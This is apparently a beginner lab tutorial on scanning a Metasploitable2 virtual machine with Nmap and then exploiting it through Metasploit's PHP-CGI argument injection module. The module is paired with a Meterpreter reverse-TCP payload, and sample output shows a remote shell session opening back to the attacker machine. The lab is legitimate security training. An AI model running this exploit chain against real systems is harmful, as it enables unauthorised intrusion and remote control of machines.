Hands-on with Kali Vulnerability Scanning Tools

CybersecurityCybersecurityBeginner
Practice Now

Introduction

In this lab, you will learn how to perform vulnerability scanning and penetration testing on a target machine using various tools in Kali Linux. The goal is to gain practical experience with popular vulnerability scanning tools and understand how to leverage the findings to conduct successful penetration attacks. The lab will be conducted on the LabEx platform, where you will be provided with a Kali Linux container as the attacking machine and a Metasploitable2 virtual machine as the target.


Skills Graph

%%%%{init: {'theme':'neutral'}}%%%% flowchart RL cybersecurity(("`Cybersecurity`")) -.-> cybersecurity/NmapGroup(["`Nmap`"]) cybersecurity/NmapGroup -.-> cybersecurity/nmap_tcp_connect_scan("`Nmap Basic TCP Connect Scan`") subgraph Lab Skills cybersecurity/nmap_tcp_connect_scan -.-> lab-416122{{"`Hands-on with Kali Vulnerability Scanning Tools`"}} end

Setting up the Environment

In this step, you will start the Kali Linux container and the Metasploitable2 target machine on the LabEx platform.

  1. Open an xfce terminal on the LabEx host machine and start the Metasploitable2 target by running the following command:
sudo virsh start Metasploitable2
  1. Test the connectivity to the target machine by pinging it:
ping 192.168.122.102

Press Ctrl+C to stop the ping.

  1. Launch the Kali Linux container and enter the bash environment by running:
docker run -ti --network host b5b709a49cd5 bash
  1. Inside the Kali container, test the network connection to the target machine:
ping 192.168.122.102

Press Ctrl+C to stop the ping.

Performing Vulnerability Scanning with Nmap

In this step, you will learn about some popular vulnerability scanning tools available in Kali Linux.

  1. X-scan: X-scan is a well-known comprehensive scanning tool in China. It is completely free, does not require installation, and supports both graphical and command-line interfaces in Chinese and English. X-scan is developed by a renowned Chinese hacker group called "Security Focus" and has been constantly improved since its internal testing version 0.2 in 2000.

  2. Nessus: Nessus is one of the most widely used vulnerability scanning and analysis software in the world. Over 75,000 organizations use Nessus to scan their computer systems. Nessus was created by Renaud Deraison in 1998 with the goal of providing a free, powerful, frequently updated, and easy-to-use remote system security scanning program for the internet community.

  3. SQLmap: SQLmap is an automatic SQL injection tool that can scan, detect, and exploit SQL injection vulnerabilities in a given URL. It currently supports MS-SQL, MySQL, Oracle, and PostgreSQL databases. SQLmap employs four unique SQL injection techniques: blind inference, UNION queries, stacked queries, and time-based blind injection.

  4. Nmap: Nmap is a powerful and versatile network exploration and security auditing tool. It can be used for various purposes, including network discovery, port scanning, and vulnerability detection.

Now, you will use Nmap to perform a vulnerability scan on the Metasploitable2 target machine.

  1. Start the Metasploit database service and initialize the database:
cd ~
service postgresql start
msfdb init
  1. Launch the Metasploit console:
msfconsole
  1. Within the Metasploit console, use the nmap command to scan the target machine:
nmap -sS -T4 192.168.122.102

Here's an example of the output you might see:

[*] exec: nmap -sS -T4 192.168.122.102

Starting Nmap 7.94 ( https://nmap.org ) at 2024-03-23 23:15 UTC
Nmap scan report for 192.168.122.102
Host is up (0.0032s latency).
Not shown: 977 closed tcp ports (reset)
PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
23/tcp   open  telnet
25/tcp   open  smtp
53/tcp   open  domain
80/tcp   open  http
111/tcp  open  rpcbind
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
512/tcp  open  exec
513/tcp  open  login
514/tcp  open  shell
1099/tcp open  rmiregistry
1524/tcp open  ingreslock
2049/tcp open  nfs
2121/tcp open  ccproxy-ftp
3306/tcp open  mysql
5432/tcp open  postgresql
5900/tcp open  vnc
6000/tcp open  X11
6667/tcp open  irc
8009/tcp open  ajp13
8180/tcp open  unknown
MAC Address: 52:54:00:1E:9E:B4 (QEMU virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 0.37 seconds

The -sS parameter performs a TCP SYN scan (also known as a half-open or stealth scan), and -T4 sets the timing policy to be aggressive but not too fast to avoid excessive network traffic.

  1. Observe the output of the scan, which should display the open ports and services on the target machine.

Press Ctrl+D to quit the Metasploit console then start the inspection

Exploiting a Vulnerability

In this step, you will use the information gathered from the Nmap scan to exploit a vulnerability on the Metasploitable2 target machine.

  1. First of all, if you are not in the Metasploit console, you should start the Metasploit console:
cd ~
msfconsole
  1. From the Nmap scan results, identify an open port on the target machine, for example, port 80. In the Metasploit console, search for an exploit module related to the open port:
search http
  1. Use the appropriate exploit module:
use exploit/multi/http/php_cgi_arg_injection
  1. Set the target machine's IP address:
set RHOST 192.168.122.102
  1. Set the payload to use:
set PAYLOAD php/meterpreter/reverse_tcp
  1. Set the local machine's IP address:
set LHOST 192.168.122.1
  1. Run the exploit:
exploit

Here's an example of the output you might see:

[*] Started reverse TCP handler on 192.168.122.1:4444 
[*] Sending stage (39927 bytes) to 192.168.122.102
[*] Meterpreter session 1 opened (192.168.122.1:4444 -> 192.168.122.102:38510) at 2024-03-23 23:21:14 +0000
  1. If the exploit is successful, you should gain access to the target machine's shell. Verify the access by running commands like sysinfo to display system information.

  2. If you have time, you can try exploring other vulnerability scanning tools like Nessus, SQLmap, or X-scan. You can also attempt to exploit different vulnerabilities on the Metasploitable2 target machine.

Press Ctrl+D to quit the Metasploit console then start the inspection

Summary

In this lab, you learned how to set up a Kali Linux environment for penetration testing and use popular vulnerability scanning tools like Nmap to identify potential vulnerabilities in a target system. You also gained hands-on experience in exploiting a vulnerability using the Metasploit Framework. This practical knowledge will help you understand the importance of vulnerability scanning and penetration testing in the field of cybersecurity.

Other Cybersecurity Tutorials you may like